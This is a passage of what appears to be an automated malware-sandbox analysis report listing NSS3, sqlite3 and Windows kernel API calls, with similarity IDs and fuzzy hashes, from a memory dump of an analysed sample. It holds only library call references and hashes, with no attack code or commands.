                                                                                                                                                                                                                              • Part of subcall function 6CBC0BE0: TlsGetValue.KERNEL32(6CBB8D2D,?,00000000,?), ref: 6CBC0C15
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CBAEEE1
                                                                                                                                                                                                                              • Part of subcall function 6CBA1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CBA1D7E
                                                                                                                                                                                                                              • Part of subcall function 6CBA1D50: EnterCriticalSection.KERNEL32(?), ref: 6CBA1D8E
                                                                                                                                                                                                                              • Part of subcall function 6CBA1D50: PR_Unlock.NSS3(?), ref: 6CBA1DD3
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBAEE51
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBAEE65
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBAEEA2
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBAEEBB
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBAEED0
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBAEF48
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBAEF68
                                                                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CBAEF7D
                                                                                                                                                                                                                            • PK11_DoesMechanism.NSS3(?,?), ref: 6CBAEFA4
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBAEFDA
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CBAF055
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBAF060
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2524771861-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_SignatureLen.NSS3(?), ref: 6CB74D80
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000000), ref: 6CB74D95
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CB74DF2
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB74E2C
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CB74E43
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CB74E58
                                                                                                                                                                                                                            • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CB74E85
                                                                                                                                                                                                                            • DER_Encode_Util.NSS3(?,?,6CCC05A4,00000000), ref: 6CB74EA7
                                                                                                                                                                                                                            • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CB74F17
                                                                                                                                                                                                                            • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CB74F45
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB74F62
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CB74F7A
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB74F89
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB74FC8
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2843999940-0
                                                                                                                                                                                                                            • Opcode ID: 1f7e98269068fba740d14c75d2578301b8b86ada65d67a8ba33f8b6492c0994b
                                                                                                                                                                                                                            • Instruction ID: b801cbb09c328256ea4e1f7c7764fbaf1a26846074c5efeea0edaa2c2107b73d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f7e98269068fba740d14c75d2578301b8b86ada65d67a8ba33f8b6492c0994b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51819F71A083419FEB21CF28D840B6BB7E4EB84359F148529FD6CDB641E730E9058FA2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CBB5C9B
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CBB5CF4
                                                                                                                                                                                                                            • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CBB5CFD
                                                                                                                                                                                                                            • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CBB5D42
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CBB5D4E
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBB5D78
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CBB5E18
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CBB5E5E
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CBB5E72
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CBB5E8B
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CBAF854
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CBAF868
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CBAF882
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: free.MOZGLUE(04C483FF,?,?), ref: 6CBAF889
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CBAF8A4
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CBAF8AB
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CBAF8C9
                                                                                                                                                                                                                              • Part of subcall function 6CBAF820: free.MOZGLUE(280F10EC,?,?), ref: 6CBAF8D0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                            • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                            • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                            • Opcode ID: 6feb4e2db345c1888c08e0fddaa9ccb47d76c8ffd67c89e35ee6adf603b2c774
                                                                                                                                                                                                                            • Instruction ID: 7a40c49e2756771450486df052acfa2451befa63c4fa87323777469e690d7991
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6feb4e2db345c1888c08e0fddaa9ccb47d76c8ffd67c89e35ee6adf603b2c774
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF71B0B0A042859BEB019F24DC45B7E3675EF4531DF180135E809BAB42EF32E959CBA7
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CBA781D,00000000,6CB9BE2C,?,6CBA6B1D,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C40
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CBA781D,?,6CB9BE2C,?), ref: 6CBA6C58
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CBA781D), ref: 6CBA6C6F
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CBA6C84
                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CBA6C96
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: TlsGetValue.KERNEL32(00000040,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51267
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: EnterCriticalSection.KERNEL32(?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB5127C
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB51291
                                                                                                                                                                                                                              • Part of subcall function 6CB51240: PR_Unlock.NSS3(?,?,?,?,6CB5116C,NSPR_LOG_MODULES), ref: 6CB512A0
                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CBA6CAA
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                            • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                            • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                            • Opcode ID: 7b410eaf780101462c1f0472c1ef0a90c5b33cf4700f261116130378b3be4b1a
                                                                                                                                                                                                                            • Instruction ID: 5f27187e7b69d8b9796fff1e320c54becead9eace638f169fe32ab8261d71a53
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b410eaf780101462c1f0472c1ef0a90c5b33cf4700f261116130378b3be4b1a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1501A2F170638277E6502BFD6C8EF66356CEF41259F140431FE04E4981FA96E51641AA
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 786543732-0
                                                                                                                                                                                                                            • Opcode ID: 1b02c8f77c7d096de7c21df3c3ba4c30cd1f4ace9e14fbc4ce6a839702a47eed
                                                                                                                                                                                                                            • Instruction ID: b88c5b0632a68b8e3ae01edac5d4ebef12bdea57ebdcf3a321ddf6e2644a2e94
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b02c8f77c7d096de7c21df3c3ba4c30cd1f4ace9e14fbc4ce6a839702a47eed
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66518BB1A012668BDB00EF99DC416BE77B4FB06349F640125D805B7B50E331EA65CFE6
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CB9ADE6
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB9AE17
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB9AE29
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB9AE3F
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CB9AE78
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB9AE8A
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB9AEA0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                                                            • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
                                                                                                                                                                                                                            • API String ID: 332880674-605059067
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_value_text16.NSS3(?), ref: 6CC34CAF
                                                                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC34CFD
                                                                                                                                                                                                                            • sqlite3_value_text16.NSS3(?), ref: 6CC34D44
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                            • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                            • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_InitPIN), ref: 6CB92DF6
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB92E24
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB92E33
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB92E49
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB92E68
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB92E81
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                                                                                                                                                                                            • API String ID: 1003633598-1777813432
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_initialize.NSS3 ref: 6CC32D9F
                                                                                                                                                                                                                              • Part of subcall function 6CAECA30: EnterCriticalSection.KERNEL32(?,?,?,6CB4F9C9,?,6CB4F4DA,6CB4F9C9,?,?,6CB1369A), ref: 6CAECA7A
                                                                                                                                                                                                                              • Part of subcall function 6CAECA30: LeaveCriticalSection.KERNEL32(?), ref: 6CAECB26
                                                                                                                                                                                                                            • sqlite3_exec.NSS3(?,?,6CC32F70,?,?), ref: 6CC32DF9
                                                                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6CC32E2C
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32E3A
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32E52
                                                                                                                                                                                                                            • sqlite3_mprintf.NSS3(6CC9AAF9,?), ref: 6CC32E62
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32E70
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32E89
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32EBB
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32ECB
                                                                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6CC32F3E
                                                                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6CC32F4C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1957633107-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(6CB83F23,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C62
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C76
                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(00000000,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C86
                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000000,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82C93
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82CC6
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23,?), ref: 6CB82CDA
                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?,?,6CB83F23), ref: 6CB82CEA
                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?), ref: 6CB82CF7
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CB7E477,?,?,?,00000001,00000000,?), ref: 6CB82D4D
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB82D61
                                                                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,?), ref: 6CB82D71
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6CB82D7E
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507AD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507CD
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAE204A), ref: 6CB507D6
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAE204A), ref: 6CB507E4
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,6CAE204A), ref: 6CB50864
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB50880
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsSetValue.KERNEL32(00000000,?,?,6CAE204A), ref: 6CB508CB
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508D7
                                                                                                                                                                                                                              • Part of subcall function 6CB507A0: TlsGetValue.KERNEL32(?,?,6CAE204A), ref: 6CB508FB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2446853827-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6CCC2120,Function_00097E60,00000000,?,?,?,?,6CBF067D,6CBF1C60,00000000), ref: 6CB77C81
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: TlsGetValue.KERNEL32(?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4C97
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CB0
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CC9
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB77CA0
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB77CB4
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB77CCF
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6CB77D04
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB77D1B
                                                                                                                                                                                                                            • realloc.MOZGLUE(-00000050), ref: 6CB77D82
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB77DF4
                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6CB77E0E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2305085145-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4C97
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CB0
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CC9
                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D11
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D2A
                                                                                                                                                                                                                            • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D4A
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D57
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D97
